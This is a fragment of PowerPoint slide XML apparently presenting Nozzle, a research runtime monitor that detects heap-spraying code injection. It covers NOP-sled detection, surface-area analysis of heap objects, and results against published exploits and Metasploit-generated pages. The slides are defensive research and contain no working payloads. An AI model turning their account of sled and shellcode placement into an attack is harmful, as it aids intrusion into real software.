        <a:ext cx="6439118" cy="1445617"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6645CA92-980E-41D2-B5F3-E2072D6C6013}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="144561" y="144561"/>
          <a:ext cx="1645920" cy="11564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3C8223-AC47-4B18-9618-E1811FA42B51}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1590178"/>
          <a:ext cx="8229600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itchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> 0 False Negatives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12 published heap spraying exploits and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2,000 synthetic rogue pages generated using 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Metasploit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790481" y="1590178"/>
        <a:ext cx="6439118" cy="1445617"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA1312B1-E36D-4993-ACDF-2299664C6124}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="144561" y="1734740"/>
          <a:ext cx="1645920" cy="11564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AF71B8-0B36-4720-B756-66BDD334ECAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3180357"/>
          <a:ext cx="8229600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itchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Runtime Overhead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As high as 2x without sampling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5-10% with sampling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790481" y="3180357"/>
        <a:ext cx="6439118" cy="1445617"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{54C60950-B23B-4769-ACE5-1F976D1AA119}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="144561" y="3324919"/>
          <a:ext cx="1645920" cy="11564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0628-525F-423E-BE4C-C96693712918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9D1C8-AAC4-4012-9D8F-9ECA2B63A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D1C8-AAC4-4012-9D8F-9ECA2B63A7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cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> opened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D888F-6F3E-4F21-8F9A-F2D68503ED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Runtime monitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> Assumes objects are code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>   and classifies</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>- Tracks current state of heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-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D1C8-AAC4-4012-9D8F-9ECA2B63A7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Adobe Reader heap spray exploit published in February 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We detoured shipping version of Adobe Reader 9.1.0 with Nozzle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Detected a published heap spray attack (NSA = 98%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Runtime overhead was 8% on average</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NSA of normal document &lt; 10%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D1C8-AAC4-4012-9D8F-9ECA2B63A7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CF11-85AB-4CFF-8EAC-FD0416555F98}" type="datetime1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C0F-448C-4512-A544-299727A3B0EE}" type="datetime1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ED2-54FF-4BBE-8DB9-62BDF4ADEB8A}" type="datetime1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1C4F-5CAF-42A5-96AA-0CF7E9A0076D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/31/2010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4492-FFFE-44D6-BD6D-3C2FB3AFA188}" type="datetime1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0A1-DAB5-4192-AEED-223E93BEE3EF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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6D69-73FB-4881-805D-A08130204044}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/31/2010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FEC-F4C9-4D73-B487-C4B7E70037B0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/31/2010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D6B9-AB24-4ECA-8D83-61BE68A5BD68}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/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AFA9-D68B-49B3-BC57-70B7AEBC8265}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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387-02C4-42B7-A6A5-DCAE917F3FCC}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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413B-4AA4-48CD-AF72-F1F8BC287BD3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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626B-2CA8-4A5D-B1ED-3706ED989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2secure.com/2009/07/mozilla-firefox-35-heap-spra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fireeye.com/research/2009/07/actionscript_heap_spray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71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/>
              <a:t>Nozzle: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A Defense Against Heap-spraying </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code Injection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467600" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="925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Paruj Ratanaworabhan, Cornell University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Ben Livshits and Ben Zorn, Microsoft Research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(Redmond, WA)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805237" cy="23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Nozzle design &amp; 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False positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>False negatives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>New threats (Adobe Reader)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Design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8600" y="1447800"/>
            <a:ext cx="2046714" cy="2495550"/>
            <a:chOff x="228600" y="1447800"/>
            <a:chExt cx="2046714" cy="2495550"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="533400" y="1905000"/>
              <a:ext cx="344488" cy="1504950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 31750 w 344488"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1504950"/>
                <a:gd name="connsiteX1" fmla="*/ 336550 w 344488"/>
                <a:gd name="connsiteY1" fmla="*/ 371475 h 1504950"/>
                <a:gd name="connsiteX2" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY2" fmla="*/ 581025 h 1504950"/>
                <a:gd name="connsiteX3" fmla="*/ 155575 w 344488"/>
                <a:gd name="connsiteY3" fmla="*/ 1066800 h 1504950"/>
                <a:gd name="connsiteX4" fmla="*/ 12700 w 344488"/>
                <a:gd name="connsiteY4" fmla="*/ 1333500 h 1504950"/>
                <a:gd name="connsiteX5" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY5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8" h="1504950">
                  <a:moveTo>
                    <a:pt x="31750" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180181" y="137319"/>
                    <a:pt x="328613" y="274638"/>
                    <a:pt x="336550" y="371475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344488" y="468313"/>
                    <a:pt x="109537" y="465138"/>
                    <a:pt x="79375" y="581025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49213" y="696912"/>
                    <a:pt x="166688" y="941388"/>
                    <a:pt x="155575" y="1066800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144463" y="1192213"/>
                    <a:pt x="25400" y="1260475"/>
                    <a:pt x="12700" y="1333500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1406525"/>
                    <a:pt x="39687" y="1455737"/>
                    <a:pt x="79375" y="150495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14400" y="2438400"/>
              <a:ext cx="344488" cy="1504950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 31750 w 344488"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1504950"/>
                <a:gd name="connsiteX1" fmla="*/ 336550 w 344488"/>
                <a:gd name="connsiteY1" fmla="*/ 371475 h 1504950"/>
                <a:gd name="connsiteX2" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY2" fmla="*/ 581025 h 1504950"/>
                <a:gd name="connsiteX3" fmla="*/ 155575 w 344488"/>
                <a:gd name="connsiteY3" fmla="*/ 1066800 h 1504950"/>
                <a:gd name="connsiteX4" fmla="*/ 12700 w 344488"/>
                <a:gd name="connsiteY4" fmla="*/ 1333500 h 1504950"/>
                <a:gd name="connsiteX5" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY5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8" h="1504950">
                  <a:moveTo>
                    <a:pt x="31750" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180181" y="137319"/>
                    <a:pt x="328613" y="274638"/>
                    <a:pt x="336550" y="371475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344488" y="468313"/>
                    <a:pt x="109537" y="465138"/>
                    <a:pt x="79375" y="581025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49213" y="696912"/>
                    <a:pt x="166688" y="941388"/>
                    <a:pt x="155575" y="1066800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144463" y="1192213"/>
                    <a:pt x="25400" y="1260475"/>
                    <a:pt x="12700" y="1333500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1406525"/>
                    <a:pt x="39687" y="1455737"/>
                    <a:pt x="79375" y="150495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71600" y="1981200"/>
              <a:ext cx="344488" cy="1504950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 31750 w 344488"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1504950"/>
                <a:gd name="connsiteX1" fmla="*/ 336550 w 344488"/>
                <a:gd name="connsiteY1" fmla="*/ 371475 h 1504950"/>
                <a:gd name="connsiteX2" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY2" fmla="*/ 581025 h 1504950"/>
                <a:gd name="connsiteX3" fmla="*/ 155575 w 344488"/>
                <a:gd name="connsiteY3" fmla="*/ 1066800 h 1504950"/>
                <a:gd name="connsiteX4" fmla="*/ 12700 w 344488"/>
                <a:gd name="connsiteY4" fmla="*/ 1333500 h 1504950"/>
                <a:gd name="connsiteX5" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY5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8" h="1504950">
                  <a:moveTo>
                    <a:pt x="31750" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180181" y="137319"/>
                    <a:pt x="328613" y="274638"/>
                    <a:pt x="336550" y="371475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344488" y="468313"/>
                    <a:pt x="109537" y="465138"/>
                    <a:pt x="79375" y="581025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49213" y="696912"/>
                    <a:pt x="166688" y="941388"/>
                    <a:pt x="155575" y="1066800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144463" y="1192213"/>
                    <a:pt x="25400" y="1260475"/>
                    <a:pt x="12700" y="1333500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1406525"/>
                    <a:pt x="39687" y="1455737"/>
                    <a:pt x="79375" y="150495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1447800"/>
              <a:ext cx="2046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 Threads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29400" y="1447800"/>
            <a:ext cx="1605311" cy="2343150"/>
            <a:chOff x="6629400" y="1447800"/>
            <a:chExt cx="1605311" cy="2343150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6934200" y="1905000"/>
              <a:ext cx="344488" cy="1504950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 31750 w 344488"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1504950"/>
                <a:gd name="connsiteX1" fmla="*/ 336550 w 344488"/>
                <a:gd name="connsiteY1" fmla="*/ 371475 h 1504950"/>
                <a:gd name="connsiteX2" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY2" fmla="*/ 581025 h 1504950"/>
                <a:gd name="connsiteX3" fmla="*/ 155575 w 344488"/>
                <a:gd name="connsiteY3" fmla="*/ 1066800 h 1504950"/>
                <a:gd name="connsiteX4" fmla="*/ 12700 w 344488"/>
                <a:gd name="connsiteY4" fmla="*/ 1333500 h 1504950"/>
                <a:gd name="connsiteX5" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY5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8" h="1504950">
                  <a:moveTo>
                    <a:pt x="31750" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180181" y="137319"/>
                    <a:pt x="328613" y="274638"/>
                    <a:pt x="336550" y="371475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344488" y="468313"/>
                    <a:pt x="109537" y="465138"/>
                    <a:pt x="79375" y="581025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49213" y="696912"/>
                    <a:pt x="166688" y="941388"/>
                    <a:pt x="155575" y="1066800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144463" y="1192213"/>
                    <a:pt x="25400" y="1260475"/>
                    <a:pt x="12700" y="1333500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1406525"/>
                    <a:pt x="39687" y="1455737"/>
                    <a:pt x="79375" y="1504950"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="7030A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15200" y="2286000"/>
              <a:ext cx="344488" cy="1504950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 31750 w 344488"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1504950"/>
                <a:gd name="connsiteX1" fmla="*/ 336550 w 344488"/>
                <a:gd name="connsiteY1" fmla="*/ 371475 h 1504950"/>
                <a:gd name="connsiteX2" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY2" fmla="*/ 581025 h 1504950"/>
                <a:gd name="connsiteX3" fmla="*/ 155575 w 344488"/>
                <a:gd name="connsiteY3" fmla="*/ 1066800 h 1504950"/>
                <a:gd name="connsiteX4" fmla="*/ 12700 w 344488"/>
                <a:gd name="connsiteY4" fmla="*/ 1333500 h 1504950"/>
                <a:gd name="connsiteX5" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY5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8" h="1504950">
                  <a:moveTo>
                    <a:pt x="31750" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180181" y="137319"/>
                    <a:pt x="328613" y="274638"/>
                    <a:pt x="336550" y="371475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344488" y="468313"/>
                    <a:pt x="109537" y="465138"/>
                    <a:pt x="79375" y="581025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49213" y="696912"/>
                    <a:pt x="166688" y="941388"/>
                    <a:pt x="155575" y="1066800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144463" y="1192213"/>
                    <a:pt x="25400" y="1260475"/>
                    <a:pt x="12700" y="1333500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1406525"/>
                    <a:pt x="39687" y="1455737"/>
                    <a:pt x="79375" y="1504950"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="7030A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772400" y="1981200"/>
              <a:ext cx="344488" cy="1504950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 31750 w 344488"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1504950"/>
                <a:gd name="connsiteX1" fmla="*/ 336550 w 344488"/>
                <a:gd name="connsiteY1" fmla="*/ 371475 h 1504950"/>
                <a:gd name="connsiteX2" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY2" fmla="*/ 581025 h 1504950"/>
                <a:gd name="connsiteX3" fmla="*/ 155575 w 344488"/>
                <a:gd name="connsiteY3" fmla="*/ 1066800 h 1504950"/>
                <a:gd name="connsiteX4" fmla="*/ 12700 w 344488"/>
                <a:gd name="connsiteY4" fmla="*/ 1333500 h 1504950"/>
                <a:gd name="connsiteX5" fmla="*/ 79375 w 344488"/>
                <a:gd name="connsiteY5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8" h="1504950">
                  <a:moveTo>
                    <a:pt x="31750" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180181" y="137319"/>
                    <a:pt x="328613" y="274638"/>
                    <a:pt x="336550" y="371475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344488" y="468313"/>
                    <a:pt x="109537" y="465138"/>
                    <a:pt x="79375" y="581025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49213" y="696912"/>
                    <a:pt x="166688" y="941388"/>
                    <a:pt x="155575" y="1066800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144463" y="1192213"/>
                    <a:pt x="25400" y="1260475"/>
                    <a:pt x="12700" y="1333500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1406525"/>
                    <a:pt x="39687" y="1455737"/>
                    <a:pt x="79375" y="1504950"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="7030A0" mc:Ignorable="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400" y="1447800"/>
              <a:ext cx="1605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Nozzle Threads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71600" y="3810000"/>
            <a:ext cx="5715000" cy="2883932"/>
            <a:chOff x="1371600" y="3810000"/>
            <a:chExt cx="5715000" cy="2883932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1371600" y="3810000"/>
              <a:ext cx="5715000" cy="2514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6324600"/>
              <a:ext cx="179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 Heap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new object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1600200" y="3124200"/>
            <a:ext cx="12192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9800" y="2895600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</a:t>
            </a:r>
          </a:p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2895600"/>
            <a:ext cx="96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</a:p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3429000" y="2971800"/>
            <a:ext cx="38862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76800" y="2667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object and classify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99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suspect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2743200"/>
            <a:ext cx="106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Repeat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572000" y="4572000"/>
            <a:ext cx="762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99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suspect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10200" y="5334000"/>
            <a:ext cx="76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benign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7000" y="5562600"/>
            <a:ext cx="76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benign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15000" y="4038600"/>
            <a:ext cx="76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benign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99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suspect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81400" y="4953000"/>
            <a:ext cx="76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benign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2286000"/>
            <a:ext cx="723900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Advantages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Just need to hook standard APIs –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malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, free, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HeapAlloc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HeapFree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, etc.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- Monitor new applications  using Detours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Can be applied to existing binaries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/>
      <p:bldP spid="23" grpId="1"/>
      <p:bldP spid="24" grpId="0"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="34" grpId="1"/>
      <p:bldP spid="35" grpId="1" animBg="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="29" grpId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Local Malicious Object Detection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2971800" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>Code or Data?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="non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2511425" y="914400"/>
            <a:ext cx="4422775" cy="639762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Is this object dangerous?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none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264025" y="2174875"/>
            <a:ext cx="4727575" cy="3921125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Is this object code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Code and data look the same on x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Focus on sled detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Majority of object is sled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Spraying scripts build simple sleds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Is this code a NOP sled?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Previous techniques do not look at heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Many heap objects look like NOP sleds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>80% false positive rates using previous techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Need stronger local techniques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F4B630-C11F-4532-A7DB-A7B147335D5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09600" y="2286000"/>
            <a:ext cx="152400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000000000000000000000000000000000000000000000000000000000000000000000000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000000000000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286000" y="2286000"/>
            <a:ext cx="160020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add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], al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09600" y="4267200"/>
            <a:ext cx="152400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0101010101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2286000" y="4267200"/>
            <a:ext cx="160020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and ah, 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05000" y="1752600"/>
            <a:ext cx="1600200" cy="3581400"/>
            <a:chOff x="1905000" y="1752600"/>
            <a:chExt cx="1600200" cy="3429000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1905000" y="1752600"/>
              <a:ext cx="1600200" cy="304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NOP sled</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3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5000" y="4800600"/>
              <a:ext cx="1600200" cy="38100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0000" mc:Ignorable=""/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="FF0000" mc:Ignorable="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/>
                <a:t>shellcode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48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Object Surface Area Calculation (1)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Assume: attacker wants to reach shell code from jump to any point in object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Goal: find blocks that are likely to be reached via control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Strategy: use dataflow analysis to compute “surface area” of each block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A0A167-59DF-4969-BF15-064A43B8E6D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5181600" y="5943600"/>
            <a:ext cx="2667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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An example object from visiting google.com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85250"/>
            <a:ext cx="3810000" cy="4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Object Surface Area Calculation (2)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block starts with its own size as weight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Weights are propagated forward with flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Invalid blocks don’t propagate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Iterate until a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fixpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is reached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compute block with highest weight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A0A167-59DF-4969-BF15-064A43B8E6D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5181600" y="5943600"/>
            <a:ext cx="2667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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An example object from visiting google.com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85250"/>
            <a:ext cx="3810000" cy="4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5562600" y="1143000"/>
            <a:ext cx="3273486" cy="4712732"/>
            <a:chOff x="5562600" y="1143000"/>
            <a:chExt cx="3273486" cy="4712732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3505200"/>
              <a:ext cx="30168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6600" y="5486400"/>
              <a:ext cx="30168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1143000"/>
              <a:ext cx="30168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6600" y="4876800"/>
              <a:ext cx="30168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2819400"/>
              <a:ext cx="30168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34400" y="3429000"/>
              <a:ext cx="30168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1143000"/>
            <a:ext cx="3273486" cy="4712732"/>
            <a:chOff x="5715000" y="1143000"/>
            <a:chExt cx="3273486" cy="4712732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5715000" y="3505200"/>
              <a:ext cx="418704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9000" y="5486400"/>
              <a:ext cx="418704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2200" y="1143000"/>
              <a:ext cx="301686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9000" y="4876800"/>
              <a:ext cx="418704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5000" y="2819400"/>
              <a:ext cx="301686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86800" y="3429000"/>
              <a:ext cx="301686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70514" y="1143000"/>
            <a:ext cx="3082590" cy="4712732"/>
            <a:chOff x="5870514" y="1143000"/>
            <a:chExt cx="3082590" cy="4712732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="TextBox 28"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5870514" y="3505200"/>
